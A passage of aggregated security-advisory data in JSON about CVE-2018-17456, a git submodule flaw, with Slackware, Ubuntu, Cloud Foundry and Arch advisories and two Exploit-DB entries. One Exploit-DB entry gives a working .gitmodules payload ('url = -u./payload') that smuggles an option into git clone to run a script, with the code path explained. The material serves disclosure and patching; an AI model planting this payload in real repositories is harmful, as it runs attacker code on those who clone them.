14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/git-2.14.5-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/git-2.14.5-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/git-2.14.5-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/git-2.14.5-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/git-2.14.5-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/git-2.14.5-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/git-2.19.1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/git-2.19.1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n40f5f0b8654c01cf8c9ea0162481c3d8 git-2.14.5-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n9f55b0f46f910514b7cab522bdb634fc git-2.14.5-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n64a2f53cd09cbab61ee764de43c6c319 git-2.14.5-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n25ac3ee0db49645eb0f2b895c0b23148 git-2.14.5-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n8d4a1a8eb0bc0a62a6520e0b5de14889 git-2.14.5-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n99ab6ab1d4685a81252893db01d63c5a git-2.14.5-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n842760c6310c5ed063d2f590adf390b8 d/git-2.19.1-i586-1.txz\n\nSlackware x86_64 -current package:\n0ffa45649ab6ffeb950a7e0eeaf2aa8f d/git-2.19.1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg git-2.14.5-i586-1_slack14.2.txz", "modified": "2018-10-11T00:35:23", "published": "2018-10-11T00:35:23", "id": "SSA-2018-283-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.442862", "type": "slackware", "title": "[slackware-security] git", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-15T01:44:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "It was discovered that git did not properly validate git submodule \nurls or paths. A remote attacker could possibly use this to craft a \ngit repository that causes arbitrary code execution when recursive \noperations are used.", "edition": 5, "modified": "2018-10-12T00:00:00", "published": "2018-10-12T00:00:00", "id": "USN-3791-1", "href": "https://ubuntu.com/security/notices/USN-3791-1", "title": "Git vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:53", "bulletinFamily": "software", "cvelist": ["CVE-2018-17456"], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n * Canonical Ubuntu 18.04\n\n# Description\n\nIt was discovered that git did not properly validate git submodule urls or paths. A remote attacker could possibly use this to craft a git repository that causes arbitrary code execution when recursive operations are used.\n\nCVEs contained in this USN include: CVE-2018-17456\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.242.0\n * All versions of Cloud Foundry cflinuxfs3 prior to 0.29.0\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.242.0 or later.\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs3 version 0.29.0 or later.\n\n# References\n\n * [USN-3791-1](<https://usn.ubuntu.com/3791-1>)\n * [CVE-2018-17456](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-17456>)\n", "edition": 3, "modified": "2018-10-15T00:00:00", "published": "2018-10-15T00:00:00", "id": "CFOUNDRY:9C6EC2561AEF786EE1E3D4A78891A5F8", "href": "https://www.cloudfoundry.org/blog/usn-3791-1/", "title": "USN-3791-1: Git vulnerability | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-10-08T16:29:40", "description": "Git Submodule - Arbitrary Code Execution. CVE-2018-17456. Local exploit for Linux platform", "published": "2018-10-05T00:00:00", "type": "exploitdb", "title": "Git Submodule - Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2018-10-05T00:00:00", "id": "EDB-ID:45548", "href": "https://www.exploit-db.com/exploits/45548/", "sourceData": "These releases fix a security flaw (CVE-2018-17456), which allowed an\r\nattacker to execute arbitrary code by crafting a malicious .gitmodules\r\nfile in a project cloned with --recurse-submodules.\r\n\r\nWhen running \"git clone --recurse-submodules\", Git parses the supplied\r\n.gitmodules file for a URL field and blindly passes it as an argument\r\nto a \"git clone\" subprocess. If the URL field is set to a string that\r\nbegins with a dash, this \"git clone\" subprocess interprets the URL as\r\nan option. This can lead to executing an arbitrary script shipped in\r\nthe superproject as the user who ran \"git clone\".\r\n\r\nIn addition to fixing the security issue for the user running \"clone\",\r\nthe 2.17.2, 2.18.1 and 2.19.1 releases have an \"fsck\" check which can\r\nbe used to detect such malicious repository content when fetching or\r\naccepting a push. See \"transfer.fsckObjects\" in git-config(1).\r\n\r\nCredit for finding and fixing this vulnerability goes to joernchen\r\nand Jeff King, respectively.\r\n\r\nP.S. Folks at Microsoft tried to follow the known exploit recipe on\r\nGit for Windows (but not Cygwin or other Git implementations on\r\nWindows) and found that the recipe (or its variants they can think\r\nof) would not make their system vulnerable. This is due to the fact\r\nthat the type of submodule path require by the known exploit recipe\r\ncannot be created on Windows. Nonetheless, it is possible we have\r\nmissed some exploitation path and users are encouraged to upgrade.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45548/"}, {"lastseen": "2018-11-27T20:19:48", "description": "Git Submodule - Arbitrary Code Execution. CVE-2018-17456. Local exploit for Linux platform", "published": "2018-10-16T00:00:00", "type": "exploitdb", "title": "Git Submodule - Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-16T00:00:00", "id": "EDB-ID:45631", "href": "https://old.exploit-db.com/exploits/45631/", "sourceData": "# CVE-2018-17456\r\n\r\nI've gotten a couple of questions about exploitation for the\r\n[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we\r\ngo with some technical details.\r\n\r\n## TL;DR\r\n\r\n[Here](https://github.com/joernchen/poc-submodule) is a PoC repository.\r\nEDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip\r\n\r\n## Exploitation\r\n\r\nThe `.gitmodules` file looks as follows:\r\n\r\n```\r\n[submodule \"x:x\"]\r\n\tpath = x:x\r\n\turl = -u./payload\r\n```\r\n\r\nThe actual command being injected is set by the url, `-u./payload`\r\npoints the `upload-pack` flag of git clone to the `payload` shell\r\nscript. Note also the `:` within the path, this part is needed to\r\nactually get the `payload` script executed.\r\n\r\nThe path will end up as the repository URL in the subsequent `clone`\r\noperation:\r\n\r\n```\r\nexecve(\"/usr/lib/git-core/git\", [\"/usr/lib/git-core/git\", \"clone\",\r\n\"--no-checkout\", \"--progress\", \"--separate-git-dir\",\r\n\"/tmp/huhu/.git/modules/x:x\", \"-u./payload\", \"/tmp/huhu/x:x\"],...\r\n```\r\n\r\nAs the actual URL from `.gitmodules` is interpreted as the `-u`\r\nargument.\r\n\r\nThe colon is due to the fact, that the colon character let us go past\r\nthose lines in `transport.c`:\r\n\r\n```c\r\n } else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) {\r\n struct bundle_transport_data *data = xcalloc(1, sizeof(*data));\r\n transport_check_allowed(\"file\");\r\n ret->data = data;\r\n ret->vtable = &bundle_vtable;\r\n ret->smart_options = NULL;\r\n```\r\n\r\nDue to `url_is_local_not_ssh` will return false due to the colon\r\nin the path. And therefore later on in the code the smart_options\r\ncontaining the `uploadpack` setting are still in place:\r\n\r\n```c\r\n } else {\r\n\t\t/* Unknown protocol in URL. Pass to external handler. */\r\n\t\tint len = external_specification_len(url);\r\n\t\tchar *handler = xmemdupz(url, len);\r\n\t\ttransport_helper_init(ret, handler);\r\n\t}\r\n\r\n\tif (ret->smart_options) {\r\n\t\tret->smart_options->thin = 1;\r\n\t\tret->smart_options->uploadpack = \"git-upload-pack\";\r\n\t\tif (remote->uploadpack)\r\n\t\t\tret->smart_options->uploadpack = remote->uploadpack;\r\n\t\tret->smart_options->receivepack = \"git-receive-pack\";1\r\n\t\tif (remote->receivepack)\r\n\t\t\tret->smart_options->receivepack = remote->receivepack;\r\n\t}\r\n```\r\n\r\n## Further hints\r\n\r\nThe constraint to have a colon in the `path` seems to hinder exploitation on Windows\r\nas a colon is a forbidden character within a path on Windows. However as noted by\r\nsome people during the disclosure: Git running within the Windows Subsystem for Linux or\r\ncygwin will allow exploitation on Windows hosts.\r\n\r\nEtienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)\r\nearlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592).", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://old.exploit-db.com/download/45631/"}], "archlinux": [{"lastseen": "2020-09-22T18:36:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "Arch Linux Security Advisory ASA-201810-7\n=========================================\n\nSeverity: High\nDate : 2018-10-09\nCVE-ID : CVE-2018-17456\nPackage : git\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-776\n\nSummary\n=======\n\nThe package git before version 2.19.1-1 is vulnerable to arbitrary code\nexecution.\n\nResolution\n==========\n\nUpgrade to 2.19.1-1.\n\n# pacman -Syu \"git>=2.19.1-1\"\n\nThe problem has been fixed upstream in version 2.19.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA security issue has been found in git versions prior to 2.19.1, which\nallows an attacker to execute arbitrary code by crafting a malicious\n.gitmodules file in a project cloned with --recurse-submodules.\nWhen running \"git clone --recurse-submodules\", Git parses the supplied\n.gitmodules file for a URL field and blindly passes it as an argument\nto a \"git clone\" subprocess. If the URL field is set to a string that\nbegins with a dash, this \"git clone\" subprocess interprets the URL as an\noption. This can lead to executing an arbitrary script shipped in the\nsuperproject as the user who ran \"git clone\".\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host by\nconvincing a local user to clone a specially crafted git repository and\nits sub-modules.\n\nReferences\n==========\n\nhttps://marc.info/?l=git&m=153875888916397&w=2\nhttps://git.kernel.org/pub/scm/git/git.git/commit/?id=98afac7a7cefdca0d2c4917dd8066a59f7088265\nhttps://git.kernel.org/pub/scm/git/git.git/commit/?id=f6adec4e329ef0e25e14c63b735a5956dc67b8bc\nhttps://git.kernel.org/pub/scm/git/git.git/commit/?id=273c61496f88c6495b886acb1041fe57965151da\nhttps://security.archlinux.org/CVE-2018-17456", "modified": "2018-10-09T00:00:00", "published": "2018-10-09T00:00:00", "id": "ASA-201810-7", "href": "https://security.archlinux.org/ASA-201810-7", "type": "archlinux", "title": "[ASA-201810-7] git: arbitrary code execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
